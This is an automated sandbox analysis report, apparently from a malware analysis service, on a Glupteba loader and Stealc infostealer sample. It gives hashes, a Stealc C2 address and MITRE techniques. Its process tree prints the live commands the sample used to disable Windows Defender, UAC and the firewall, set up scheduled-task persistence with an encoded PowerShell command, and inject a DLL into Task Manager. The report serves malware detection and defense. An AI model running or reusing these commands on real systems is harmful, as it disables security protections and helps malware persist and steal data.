glupteba | 3555805731fe9aeb942a0859e9205481f6367547068658f57ddf38859b8b5cba

Analysis

max time kernel
0s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
16/01/2024, 16:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

5.0MB
MD5

9fbddfa2696d5061750e6e0ff2162c28
SHA1

a2cc8c949d1404058657ca7fb81854ae092762f3
SHA256

3555805731fe9aeb942a0859e9205481f6367547068658f57ddf38859b8b5cba
SHA512

ea2b807664bc4844ee92f9970ce63a12a98cc42ec23c0f893ef206d09eab9ef6e5b23f36b2671495ee6574e77b0d7cce6503a8950fc48db058037401b1cb068e
SSDEEP

49152:ty/agNoehGYQBcQSiiQMchTQU0Pglz1OCuFTeeoXSS0x1HMToTQFAxTi4I0HQiuq:7CU0Pg91TXKs8Tk4W+f64X

Score

10^/10

glupteba stealc dropper evasion loader stealer trojan upx

Malware Config

Extracted

Family

stealc

http://185.172.128.79

Attributes

url_path
/3886d2276f6914c4.php

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 5 IoCs

resource	yara_rule
behavioral2/memory/2156-75-0x0000000002F70000-0x000000000385B000-memory.dmp	family_glupteba
behavioral2/memory/2156-86-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/4516-104-0x0000000002EA0000-0x000000000378B000-memory.dmp	family_glupteba
behavioral2/memory/4516-118-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/5080-271-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
5036	netsh.exe
3624	netsh.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000023263-349.dat	upx
behavioral2/files/0x0006000000023272-366.dat	upx
behavioral2/memory/4500-371-0x0000000000A70000-0x0000000000F58000-memory.dmp	upx
behavioral2/files/0x0006000000023263-375.dat	upx
behavioral2/files/0x0006000000023263-381.dat	upx
behavioral2/files/0x0006000000023263-362.dat	upx
behavioral2/files/0x0006000000023263-354.dat	upx
behavioral2/files/0x0006000000023263-343.dat	upx
behavioral2/files/0x00070000000232b0-753.dat	upx
behavioral2/files/0x00070000000232b0-754.dat	upx
behavioral2/files/0x00070000000232b0-756.dat	upx
behavioral2/memory/6084-758-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/5648-811-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/5648-826-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5724	sc.exe

Program crash 4 IoCs

pid	pid_target	Process	procid_target
4744	2156	WerFault.exe	94
1108	4516	WerFault.exe	102
5592	5080	WerFault.exe	123
5148	4284	WerFault.exe	104

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2156	schtasks.exe
224	schtasks.exe
4180	schtasks.exe
6116	schtasks.exe
3700	schtasks.exe
5944	schtasks.exe
5612	schtasks.exe
5276	schtasks.exe
6104	schtasks.exe
5900	schtasks.exe
1340	schtasks.exe
5784	schtasks.exe
6136	schtasks.exe
5948	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5720	timeout.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2876	file.exe
3316	powershell.exe
3316	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2876	file.exe
Token: SeDebugPrivilege	3316	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 3316	2876	file.exe	14
PID 2876 wrote to memory of 3316	2876	file.exe	14

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3316
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  PID:3100
- - C:\Users\Admin\Pictures\KQ5ILSm1kOhxlFbVWVTE2vhI.exe
    "C:\Users\Admin\Pictures\KQ5ILSm1kOhxlFbVWVTE2vhI.exe"
    3⤵
    PID:344
- - C:\Users\Admin\Pictures\VeKMZ2LBbA86ir5yXxI4YkaP.exe
    "C:\Users\Admin\Pictures\VeKMZ2LBbA86ir5yXxI4YkaP.exe"
    3⤵
    PID:2156
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 888
      4⤵
      Program crash
      PID:4744
  - - C:\Users\Admin\Pictures\VeKMZ2LBbA86ir5yXxI4YkaP.exe
      "C:\Users\Admin\Pictures\VeKMZ2LBbA86ir5yXxI4YkaP.exe"
      4⤵
      PID:524
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4136
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2156
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5628
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:5200
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5432
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6052
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:6008
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5944
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3060
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:4584
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5612
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        
        PID:6084
- - C:\Users\Admin\Pictures\wvBxMPduWHJ4Iw6qjNH8q1WU.exe
    "C:\Users\Admin\Pictures\wvBxMPduWHJ4Iw6qjNH8q1WU.exe"
    3⤵
    PID:2264
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      PID:2088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:2320
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:3700
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:1684
  - - C:\Users\Admin\AppData\Local\Temp\nsp5E9D.tmp
      C:\Users\Admin\AppData\Local\Temp\nsp5E9D.tmp
      4⤵
      PID:4284
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 3336
        5⤵
        Program crash
        
        PID:5148
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsp5E9D.tmp" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:5024
- - C:\Users\Admin\Pictures\5eE9zbD7cGBGhe5N5qbQn0pz.exe
    "C:\Users\Admin\Pictures\5eE9zbD7cGBGhe5N5qbQn0pz.exe"
    3⤵
    PID:4516
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 884
      4⤵
      Program crash
      PID:1108
  - - C:\Users\Admin\Pictures\5eE9zbD7cGBGhe5N5qbQn0pz.exe
      "C:\Users\Admin\Pictures\5eE9zbD7cGBGhe5N5qbQn0pz.exe"
      4⤵
      PID:5080
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4548
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5804
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 856
        5⤵
        Program crash
        
        PID:5592
- - C:\Users\Admin\Pictures\VhNRLKkxTTCHbyJCiMvW6FTg.exe
    "C:\Users\Admin\Pictures\VhNRLKkxTTCHbyJCiMvW6FTg.exe"
    3⤵
    PID:332
  - - C:\Users\Admin\AppData\Local\Temp\7zS5FF2.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:5040
- - C:\Users\Admin\Pictures\dgQxmWTgqZnaWfZuTYEHQ98I.exe
    "C:\Users\Admin\Pictures\dgQxmWTgqZnaWfZuTYEHQ98I.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
    3⤵
    PID:4416
- - C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe
    "C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe" --silent --allusers=0
    3⤵
    PID:2868
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635491\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635491\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
      4⤵
      PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635491\assistant\assistant_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635491\assistant\assistant_installer.exe" --version
      4⤵
      PID:5520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
1⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\7zS6283.tmp\Install.exe
.\Install.exe /gdidwDXwn "385118" /S
1⤵
PID:4400
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
  2⤵
  PID:3272
- - C:\Windows\SysWOW64\cmd.exe
    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
    3⤵
    PID:2420
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gtleatvKT" /SC once /ST 14:52:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2156
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:3624
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gtleatvKT"
  2⤵
  PID:5048
- C:\Windows\SysWOW64\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
  2⤵
  PID:3960
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gtleatvKT"
  2⤵
  PID:5692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 16:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\MLfmTCn.exe\" Ik /issite_idweF 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2156 -ip 2156
1⤵
PID:4340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4516 -ip 4516
1⤵
PID:1016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
1⤵
PID:4368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
1⤵
PID:4316

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
1⤵
PID:3032

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
1⤵
PID:3524

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
1⤵
PID:3752

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
1⤵
PID:5048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3752
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5768

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
1⤵
PID:4076

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:5036

C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe
C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2e8,0x2f8,0x6f649530,0x6f64953c,0x6f649548
1⤵
PID:4076

C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe
C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x2fc,0x300,0x304,0x2cc,0x308,0x6d889530,0x6d88953c,0x6d889548
1⤵
PID:768

C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe
"C:\Users\Admin\Pictures\uMt47HxaFyXZSgWcAg62sHJo.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2868 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240116163549" --session-guid=73287de6-b727-428e-a1c7-69d9836b5e5e --server-tracking-blob=NDFhY2YwNTM3NDljZmI5MTliNTBjYjg2MDcyY2JlODNmYzMyNmIxZjMxZGM4YTc2NDI1NjIzODdjNTJkNmE2Zjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTQyMjk0MS40MjgyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJjOTY3NjRjYy0zMzNlLTRlMDktODE3OS01NTdiYmZhMzdiZjkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1405000000000000
1⤵
PID:3564

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\uMt47HxaFyXZSgWcAg62sHJo.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\uMt47HxaFyXZSgWcAg62sHJo.exe" --version
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5080 -ip 5080
1⤵
PID:5588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5772

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4548

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
PID:5680
- C:\Windows\SysWOW64\sc.exe
  sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
  2⤵
  - Launches sc.exe
  PID:5724

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5648

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
1⤵
- Delays execution with timeout.exe
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4284 -ip 4284
1⤵
PID:3848

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635491\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161635491\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xc72614,0xc72620,0xc7262c
1⤵
PID:5540

C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\MLfmTCn.exe
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\MLfmTCn.exe Ik /issite_idweF 385118 /S
1⤵
PID:868
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
